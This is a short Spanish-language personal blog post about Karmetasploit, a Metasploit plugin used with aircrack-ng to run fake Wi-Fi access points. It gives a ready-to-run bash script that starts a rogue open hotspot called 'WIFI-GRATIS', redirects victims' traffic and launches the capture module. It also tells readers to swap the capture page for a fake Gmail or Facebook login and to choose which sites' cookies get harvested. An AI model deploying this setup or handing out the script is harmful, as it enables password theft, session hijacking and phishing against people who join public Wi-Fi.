Karmetasploit

Para los que no se  acuerden les comento que  hace algunos ayeres tuvimos en Oaxaca Digital un curso de Metasploit, muy bueno por cierto, ahi el jefe diego nos explico lo basico de este framework y nos dejo de tarea revisar algunas otras cosas entre las que estaba karmetasploit; un plugin de metasploit que usándolo junto con aircrack-ng te permite crear puntos de acceso  falsos, capturar contraseñas y llevar a cabo ataques contra el navegador de los clientes.

y pues visitando el blog de Pepelux me encuentro con un muy buen tutorial de como utilizar  este plugin.

Para comenzar a utilizarlo  obvio que tienes que tener  instalado  metasploit  lo pueden bajar en  http://www.metasploit.com,  también necesitas el airgrack-ng, ademas de ruby, sqlite3 y dhcp-server en tu linux por ultimo y mas importante el plugin de karmasploit para el framework de metasploit el cual lo puedes bajar de la misma web de metasploit…

Un pequeño script que arrancaría todo de golpe podrá ser:

#!/bin/bash
killall -9 dhcpd3 airbase-ng
airmon-ng start ath0
airbase-ng -P -C 30 -e "WIFI-GRATIS" -v ath1
>/dev/null 2>&1 &
sleep 2

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
iptables -t nat -A PREROUTING -i at0 -j REDIRECT
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
msfconsole -r karma.rc

Por otro lado, podemos personalizar un poco el fake. Cuando alguien se conecta a cualquier web a través del AP falso le saldrá una página negra que pone: Loading …

Esto lo podemos cambiar en /opt/metasploit3/msf3/data/exploits/capture/http … concretamente el fichero es index.html y lo podemos editar a nuestro gusto, incluso poner un fake de gmail o de facebook.

También se puede personalizar el fichero sites.txt (en el mismo directorio), que contiene los sitios más típicos y de los cuales karmetasploit intentará recuperar las cookies.

la verdad tengo que decir que con todo este rollo me dieron ganas de que diego vuelva a dar un curso de seguridad, esperemos que pronto se pueda armar algo :D…

Deja un comentario

Urielmania

“El Mundo de Uriel… Pero la voz de todos”